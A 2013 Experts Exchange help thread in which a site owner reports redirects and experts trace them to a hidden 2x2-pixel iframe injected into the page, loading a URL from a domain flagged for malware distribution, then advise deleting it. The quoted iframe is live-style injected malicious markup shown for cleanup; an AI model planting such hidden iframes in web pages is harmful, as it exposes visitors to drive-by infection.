Solved

Hijacked site

Posted on 2013-01-17
9
447 Views
Last Modified: 2013-12-06
I am trying to sort out another issue on the following site, however since I've posted the question and link to in on Expert Exchange, it seems that the site has been hijcked and is re-directing to another site. The site in question is:

http://www.neuproessentials.co.uk

this is what a previous expert had to say ID: 38790188

Used a hack / slave AV machive and get redirected to:
http://macskako.com/hmod.html giving :

Forbidden
You don't have permission to access /hmod.html on this server.

Additionally, a 403 Forbidden error was encountered while trying to use an ErrorDocument to handle the request.

Open in new window

                                           
Any help on how to correct this would be greatly appreciated.

Thanks
0
Comment
Question by:smythers
9 Comments
 
LVL 1

Expert Comment

by:SirLagz
ID: 38792295
That site is working for me at the moment.
Going to a Neupro patches site ?
0
 

Author Comment

by:smythers
ID: 38792368
Yes, that's what it's meant to be doing but the experts who were trying to click on the link yesterday were getting redirected to some strange site and suggested I get it sorted here first.. Thanks for taking a look

I don't suppose you would be able to tell my why the video on this page will not work in IE 6, 7 or 8? That is my real problem.
0
 
LVL 38

Expert Comment

by:BillDL
ID: 38794281
I'm getting redirected to:
http://macskako.com/hmod.html
in Google Chrome but not in IE8.

Forbidden
You don't have permission to access /hmod.html on this server.
Additionally, a 403 Forbidden error was encountered while trying to use an ErrorDocument to handle the request.

This comment is at 19:00 GMT, just as a reference.

Right at the end of your http://www.neuproessentials.co.uk after the tracking script you have this:

<!-- WiredMinds Piwik tracking END -->
<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://macskako.com/hmod.html></iframe></body>
</html>

Open in new window


Did you place that there?
0
Is Your Active Directory as Secure as You Think?

More than 75% of all records are compromised because of the loss or theft of a privileged credential. Experts have been exploring Active Directory infrastructure to identify key threats and establish best practices for keeping data safe. Attend this month’s webinar to learn more.

 
LVL 38

Expert Comment

by:BillDL
ID: 38794287
Now it loads the correct page in Chrome 2nd time around.

By the way, the domain macskako.com is registered in Budapast, Hungary.
http://www.dnsstuff.com/tools#whois/type=domain&&value=macskako.com&&
0
 
LVL 38

Accepted Solution

by:
BillDL earned 500 total points
ID: 38795825
Some Info:

http://evuln.com/tools/malware-scanner/www.neuproessentials.co.uk/

http://evuln.com/tools/malware-scanner/macskako.com/


Safe Browsing Diagnostic page for neuproessentials.co.uk valid at 07:00 GMT 19th January 2013
http://www.google.com/safebrowsing/diagnostic?site=neuproessentials.co.uk/

What is the current listing status for neuproessentials.co.uk?
This site is not currently listed as suspicious.
What happened when Google visited this site?
Google has not visited this site within the past 90 days.
Has this site acted as an intermediary resulting in further distribution of malware?
Over the past 90 days, neuproessentials.co.uk did not appear to function as an intermediary for the infection of any sites.
Has this site hosted malware?
No, this site has not hosted malicious software over the past 90 days.

Safe Browsing Diagnostic page for macskako.com  valid at 07:00 GMT 19th January 2013
http://www.google.com/safebrowsing/diagnostic?site=macskako.com/

What is the current listing status for macskako.com?
This site is not currently listed as suspicious.

What happened when Google visited this site?
Of the 2 pages we tested on the site over the past 90 days, 0 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2012-11-17, and the last time suspicious content was found on this site was on 2012-11-17.
Malicious software includes 1 trojan(s).

This site was hosted on 1 network(s) including AS12301 (INVITEL).

Has this site acted as an intermediary resulting in further distribution of malware?
Over the past 90 days, macskako.com appeared to function as an intermediary for the infection of 8 site(s) including showyai.com, techinspecialed.com, geocaching.com.

Has this site hosted malware?
No, this site has not hosted malicious software over the past 90 days.


Search all your website's pages for this tag:
<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://macskako.com/hmod.html></iframe>

Open in new window

and delete from <iframe> through to and including </iframe> for each instance.
0
 
LVL 38

Expert Comment

by:BillDL
ID: 39345902
Thanks younghv
0
 
LVL 38

Expert Comment

by:younghv
ID: 39346032
Hey BillDL -
Glad to help.
I've been on hiatus for several months, but will endeavor (endeavour) to keep these caught up better.
Vic
0

Featured Post

Is Your Active Directory as Secure as You Think?

More than 75% of all records are compromised because of the loss or theft of a privileged credential. Experts have been exploring Active Directory infrastructure to identify key threats and establish best practices for keeping data safe. Attend this month’s webinar to learn more.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

Suggested Solutions

Title # Comments Views Activity
Hidden Trojan on website by Kaspersky - How to find it? 2 86
mitigations for web fraud 11 108
Virus or Ransom ware 6 367
ransomware and redirected folders 9 95
UPDATE - 6/15/2011 Added support for Release Update 6 Maintenance Patch 2 Point Patch 1 (RU6 MP2 PP1). Fixed a defect in the username field that was hard-coded to look for a specific domain (left over code from testing). This release will be the …
To Remove Security Suite for Windows Malware from a Windows XP Machine:  Restart computer in Safe Mode (to do this see http://tinyurl.com/me78p) Login as Administrator Go to My Computer /Tools/ Folder Options/ View/  check mark the selectio…
In this video I am going to show you how to back up and restore Office 365 mailboxes using CodeTwo Backup for Office 365. Learn more about the tool used in this video here: http://www.codetwo.com/backup-for-office-365/ (http://www.codetwo.com/ba…
With the power of JIRA, there's an unlimited number of ways you can customize it, use it and benefit from it. With that in mind, there's bound to be things that I wasn't able to cover in this course. With this summary we'll look at some places to go…

867 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question

Need Help in Real-Time?

Connect with top rated Experts

16 Experts available now in Live!

Get 1:1 Help Now